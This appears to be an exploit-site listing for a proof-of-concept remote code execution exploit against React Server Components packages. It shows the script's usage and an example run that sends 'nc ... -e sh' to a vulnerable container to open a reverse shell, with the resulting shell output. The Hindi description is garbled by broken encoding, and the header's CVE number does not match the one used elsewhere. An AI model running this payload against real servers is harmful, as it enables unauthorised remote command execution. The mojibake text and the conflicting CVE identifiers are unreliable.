Sploitus

Exploit for PoC

kitploit ┬╖ 2026-09-06

Exploit Code

MARKDOWN45 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MASTERWOK-POC-CVE-2025-55182
# PoC: CVE-2026-33017

> React Server Components рдХреЗ рд╕рдВрд╕реНрдХрд░рдг 19.0.0, 19.1.0, 19.1.1 рдФрд░ 19.2.0 рдореЗрдВ рдкреНрд░реА-рдСрдереЗрдВрдЯрд┐рдХреЗрд╢рди рд░рд┐рдореЛрдЯ рдХреЛрдб рдПрдХреНрдЬрд╝реАрдХреНрдпреВрд╢рди рднреЗрджреНрдпрддрд╛ рдореМрдЬреВрдж рд╣реИ, рдЬрд┐рд╕рдореЗрдВ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдкреИрдХреЗрдЬ рд╢рд╛рдорд┐рд▓ рд╣реИрдВ: react-server-dom-parcel, react-server-dom-turbopack, рдФрд░ react-server-dom-webpackред рдХрдордЬреЛрд░ рдХреЛрдб рд╕рд░реНрд╡рд░ рдлрдВрдХреНрд╢рди рдПрдВрдбрдкреЙрдЗрдВрдЯреНрд╕ рдкрд░ HTTP рдЕрдиреБрд░реЛрдзреЛрдВ рд╕реЗ рдкреЗрд▓реЛрдб рдХреЛ рдЕрд╕реБрд░рдХреНрд╖рд┐рдд рд░реВрдк рд╕реЗ рдбреАрд╕реАрд░рд┐рдпрд▓рд╛рдЗрдЬрд╝ рдХрд░рддрд╛ рд╣реИред

https://nvd.nist.gov/vuln/detail/CVE-2025-55182

* * *

## рдЙрдкрдпреЛрдЧ

root@kitploit:~
    
    
    usage: CVE-2025-55182.py [-h] --command COMMAND target
    
    PoC exploit: CVE-2025-55182
    
    positional arguments:
      target             Target hostname
    
    options:
      -h, --help         show this help message and exit
      --command COMMAND  Command to run on target
    

## рдЙрджрд╛рд╣рд░рдг

root@kitploit:~
    
    
    # Create docker instance
    docker run -d -p 3000:3000 ihsansencan/react2shell:cve-2025-55182
    
    # Start listener
    nc -lnvp 4444
    
    # Launch exploit
    python3 CVE-2025-55182.py http://127.0.0.1:3000/ --command "nc 192.168.1.211  4444 -e sh"
    
    # Should receive reverse shell in listener
    Listening on 0.0.0.0 4444
    Connection received on 172.17.0.2 43911
    uname -a
    Linux f346806b6f59 6.17.0-20-generic #20~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Mar 19 01:28:37 UTC 2 x86_64 Linux